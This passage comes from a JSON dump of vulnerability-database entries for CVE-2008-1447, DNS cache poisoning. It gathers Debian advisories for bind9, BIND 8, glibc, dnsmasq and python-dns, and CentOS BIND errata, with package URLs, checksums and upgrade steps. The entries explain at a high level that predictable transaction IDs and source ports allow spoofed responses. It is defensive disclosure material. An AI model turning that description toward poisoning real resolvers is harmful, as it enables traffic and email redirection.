checksum: 472708 9edfb07c186a93aea1a2e602e0ee6335\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 94822 d2fc00416dc090a535b280f48eee7f46\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 169930 47c43c9738afb7ed72618930dc702ed3\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 296722 dd1979969210386fc36d119e19e12cc2\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 996528 56db22ee21e053443e72ccd11a25181b\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_i386.deb\n Size/MD5 checksum: 110134 5491e4e33e43f1300840b62947690b7a\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 232052 eb9215cb2ba71ded815b4ca6f0ac0744\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 99978 ceee4c1dc16fdf2d7fefe1aee6d8dd85\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 393324 553b67ca638482db8e1586d231f03abe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 740264 a30c98b25296a147d47d7f44c8418883\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 127606 33d62368c2ce437e660708eb6b0ffe2b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 216344 0a0b33f34dbeb744bd8af8ad8388048f\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 125806 3aafce71b9e4ecaf01602c409a355b54\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 1584302 d982b4443c38056cdeb80b327ee36f3a\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 117782 ae8ae735a8054ff473d305b06c90c68a\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 102432 4443f6e43cc1e4c7448965a0501bfe54\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_ia64.deb\n Size/MD5 checksum: 280866 c20244c3a06177b934ac804b382b85c7\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 174012 cf61e15aa7c79b40ae94a3c1d08ba496\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 301476 4094fd919da162322ea07d62378cc664\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 110326 be73e626902012ca986d4192804017e7\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 180490 dde7f37a0a2456190461f5f26bf30ab6\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 1229398 37af92bf5074d9a260fd4ff5346dc4b8\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 211386 8083484e19ebc9099022954350c6baf7\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94992 46f858e2ed33a864539476d25bd9b44f\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 94230 6bfa6b8d78c46567a341f6174f9aa874\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 491862 fc2d747a29c0116da5936b4964ef8146\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 113268 58fb17d2ee0415e13fdad4727534b6cc\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mips.deb\n Size/MD5 checksum: 107912 5834642a56bb9548510f8cd0a3ae766f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 299514 0b5de102f7ddf83d497498b320613556\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 488260 7b85b99ea5c24f74e531bbd9056672e9\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 1205384 a3211957988d4aaae40776ff41cf6a01\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 113016 dddd0a37c778cd68696318a7adc1abcd\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 110254 6754bc57fcac807b5569531f7e821802\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 174148 23e91bbb42a44ca80535079660813277\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 179630 fa26c51aa248cb502ac54544bdd6ced0\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 210904 21784fc7019a384e78ecc94a10f4e315\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94936 2068abe2f2e78675ad94ea28579efc87\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 107166 2cfce41a4fc41aa9986cdef01e09705d\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mipsel.deb\n Size/MD5 checksum: 94098 c95a157cfa3feef62450afdef3fe65a8\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 173606 9618a781d59f94f751e18db86cf6b948\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 112276 e786724068250eb53c475a3e51035d51\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 113842 4961da1e75c17f3f00621acfc06d10fe\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 488428 b777fc3fe13b319817f955f116b40e83\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 1167832 75f402f7bf328da5deee364f4266558d\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96204 57ec688c7f24161e347054dc93fbd757\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 96170 77d5b9189a05f2b3dca7901bff6e56df\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 301276 dddf71278c1f4afbbc49019248f4328e\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 109288 8fd2b3005fcf95e3616ec8a77b3ad322\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 183310 b9eb85b58aaf29a3106d16410c0d379a\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_powerpc.deb\n Size/MD5 checksum: 206830 b286690dde8d1412c2de3fa99f7d3c5b\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 114234 23a30b0e26db0210a1be48c4d44b6d7f\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 331864 7c3fab929f1e29873ecfc7c7c4b52ddc\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 116656 8abeeeb22e800f63e4b30e0c2dd974e0\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 1137342 820a17acdc24ef1dd0c1db7b8e6fc470\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 233948 635487d4e6ea4d15704bb14b8cf9236c\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 196598 2198086ee8c358aa3ed5046708a31f45\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 194704 c897d956b11161ae8e31e4bffb489883\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 118140 e5e11d59852a32dcd1b78b4aabd22fff\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 95664 050d558c3d06e520fb4e6c6cebd520c3\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 579484 6fc80f5cde0c2d01b49ae53f027eeecc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_s390.deb\n Size/MD5 checksum: 97786 5dda64259aa80e1c2e085e7fc2430299\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 300090 21095a9477d8db8bdbca300235ddc296\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 210606 8bd074b427b5f732c5584ca265bb2c28\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 1121664 2750abf3a8e3ffa54d1b15f6a5b6738e\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94822 4e2634cf2561a237174a6863377b24cd\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 175248 4231a2791083fc82977535613d38ef2a\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 184036 aea98952994fb97c74df02ae4ed2f28d\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 107574 b6a3a3204c134d54dce2d8d79f77f647\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 493628 b5c5a9638091fd0d6543a405bfdefd53\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 94828 4657a6a42f7f2fac5ef96d273e9de4df\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 114258 32f88744a6e6e648377dda42ff910cbb\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_sparc.deb\n Size/MD5 checksum: 111158 a59dbf1edb5518b09b2993049922c01a\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 9, "modified": "2008-07-08T17:03:22", "published": "2008-07-08T17:03:22", "id": "DEBIAN:DSA-1603-1:C7E04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00184.html", "title": "[SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:20", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1604-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : bind\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThe BIND 8 legacy code base could not be updated to include the\nrecommended countermeasure (source port randomization, see DSA-1603-1\nfor details). There are two ways to deal with this situation:\n\n1. Upgrade to BIND 9 (or another implementation with source port\nrandomization). The documentation included with BIND 9 contains a\nmigration guide.\n\n2. Configure the BIND 8 resolver to forward queries to a BIND 9\nresolver. Provided that the network between both resolvers is trusted,\nthis protects the BIND 8 resolver from cache poisoning attacks (to the\nsame degree that the BIND 9 resolver is protected).\n\nThis problem does not apply to BIND 8 when used exclusively as an\nauthoritative DNS server. It is theoretically possible to safely use\nBIND 8 in this way, but updating to BIND 9 is strongly recommended.\nBIND 8 (that is, the bind package) will be removed from the etch\ndistribution in a future point release.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:04:04", "published": "2008-07-08T17:04:04", "id": "DEBIAN:DSA-1604-1:E1CB3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00185.html", "title": "[SECURITY] [DSA 1604-1] BIND 8 deprecation notice", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:21:36", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1605-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 08, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : glibc\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nCERT advisory : VU#800113\n\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS spoofing and cache poisoning attacks. Among\nother things, successful attacks can lead to misdirected web traffic\nand email rerouting.\n\nAt this time, it is not possible to implement the recommended\ncountermeasures in the GNU libc stub resolver. The following\nworkarounds are available:\n\n1. Install a local BIND 9 resoler on the host, possibly in\nforward-only mode. BIND 9 will then use source port randomization\nwhen sending queries over the network. (Other caching resolvers can\nbe used instead.)\n\n2. Rely on IP address spoofing protection if available. Successful\nattacks must spoof the address of one of the resolvers, which may not\nbe possible if the network is guarded properly against IP spoofing\nattacks (both from internal and external sources).\n\nThis DSA will be updated when patches for hardening the stub resolver\nare available.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-08T17:05:37", "published": "2008-07-08T17:05:37", "id": "DEBIAN:DSA-1605-1:9D185", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00186.html", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:30", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1623-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 31, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dnsmasq\nVulnerability : DNS cache poisoning\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\n\nDan Kaminsky discovered that properties inherent to the DNS protocol\nlead to practical DNS cache poisoning attacks. Among other things,\nsuccessful attacks can lead to misdirected web traffic and email\nrerouting.\n\nThis update changes Debian's dnsmasq packages to implement the\nrecommended countermeasure: UDP query source port randomization. This\nchange increases the size of the space from which an attacker has to\nguess values in a backwards-compatible fashion and makes successful\nattacks significantly more difficult.\n\nThis update also switches the random number generator to Dan\nBernstein's SURF.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.35-1+etch4. Packages for alpha will be provided later.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.43-1.\n\nWe recommend that you upgrade your dnsmasq package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.dsc\n Size/MD5 checksum: 596 3834461c89e55467b4b65ed4ac209e81\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35.orig.tar.gz\n Size/MD5 checksum: 252901 ad1fafeaf3442685cfe16613e0f8b777\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.diff.gz\n Size/MD5 checksum: 19202 4ced7768f49198bd43bbbd24f2a3d3e4\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_amd64.deb\n Size/MD5 checksum: 188278 8fb55f694db9fdfccaa86d134e937777\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_arm.deb\n Size/MD5 checksum: 181746 4caf23f31de937b817e12ade7d132eac\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_hppa.deb\n Size/MD5 checksum: 190490 66730e785683655b058d11aa70346be4\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_i386.deb\n Size/MD5 checksum: 184546 1fbdd71e81a1e05d68b0f88eaeb00b10\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_ia64.deb\n Size/MD5 checksum: 223758 011f283b71ef0f9e07d5a9dce25db505\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mips.deb\n Size/MD5 checksum: 189846 5c67cca2eaedc1dff80c5fd05aa1d33f\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mipsel.deb\n Size/MD5 checksum: 191824 dfd87d69a7751f1e6ef2d0f1ede052ff\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_powerpc.deb\n Size/MD5 checksum: 186890 93701abcca5421beddab015a7f35af99\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_s390.deb\n Size/MD5 checksum: 186396 6f19f6c8d803c3d57e01e73fe1e11886\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_sparc.deb\n Size/MD5 checksum: 182910 f360078c14f715e90e60124b4ede2be9\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-07-31T16:45:43", "published": "2008-07-31T16:45:43", "id": "DEBIAN:DSA-1623-1:F6633", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00208.html", "title": "[SECURITY] [DSA 1623-1] New dnsmasq packages fix cache poisoning", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-30T02:22:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1619-2 security@debian.org\nhttp://www.debian.org/security/ Devin Carraway\nSeptember 22, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : python-dns\nVulnerability : DNS response spoofing\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1447\nDebian Bug : 490217\n\nIn DSA-1619-1, an update was announced for DNS response spoofing\nvulnerabilities in python-dns. The fix introduced a regression in the\nlibrary breaking the resolution of UTF-8 encoded record names. An\nupdated release is available which corrects this problem. For\nreference, the original advisory text follows.\n\nMultiple weaknesses have been identified in PyDNS, a DNS client\nimplementation for the Python language. Dan Kaminsky identified a\npractical vector of DNS response spoofing and cache poisoning,\nexploiting the limited entropy in a DNS transaction ID and lack of\nUDP source port randomization in many DNS implementations. Scott\nKitterman noted that python-dns is vulnerable to this predictability,\nas it randomizes neither its transaction ID nor its source port.\nTaken together, this lack of entropy leaves applications using\npython-dns to perform DNS queries highly susceptible to response\nforgery.\n\nThe Common Vulnerabilities and Exposures project identifies this\nclass of weakness as CVE-2008-1447.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 2.3.0-5.2+etch2.\n\nWe recommend that you upgrade your python-dns package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch2.diff.gz\n Size/MD5 checksum: 3807 4c9dceefe0dfc4ee933f3c9298764153\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0.orig.tar.gz\n Size/MD5 checksum: 21084 82d377c6a59181072b30b0da4e9835b8\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch2.dsc\n Size/MD5 checksum: 695 16b84a9d56bdd4baf5cdf1bf7e413521\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch2_all.deb\n Size/MD5 checksum: 22972 59775332c3bb11b1408c83cf25b8e253\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 2, "modified": "2008-09-22T06:12:15", "published": "2008-09-22T06:12:15", "id": "DEBIAN:DSA-1619-2:7599F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00233.html", "title": "[SECURITY] [DSA-1619-2] New python-dns package fixes regression", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:28:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533-03\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027120.html\n\n**Affected packages:**\nbind\nbind-devel\nbind-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 3, "modified": "2008-07-09T01:20:56", "published": "2008-07-09T01:20:56", "href": "http://lists.centos.org/pipermail/centos-announce/2008-July/027120.html", "id": "CESA-2008:0533-03", "title": "bind security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-08T03:33:58", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027114.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027115.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027116.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027117.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027118.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027119.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027121.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027122.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027126.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027127.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027128.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027129.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039473.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039474.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\nselinux-policy\nselinux-policy-devel\nselinux-policy-mls\nselinux-policy-strict\nselinux-policy-targeted\nselinux-policy-targeted-sources\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0533.html", "edition": 4, "modified": "2008-07-12T12:47:34", "published": "2008-07-08T22:25:27", "href": "http://lists.centos.org/pipermail/centos-announce/2008-July/027115.html", "id": "CESA-2008:0533", "title": "bind, caching, selinux security update", "type": "centos", "cvss": {"score": 5.0, 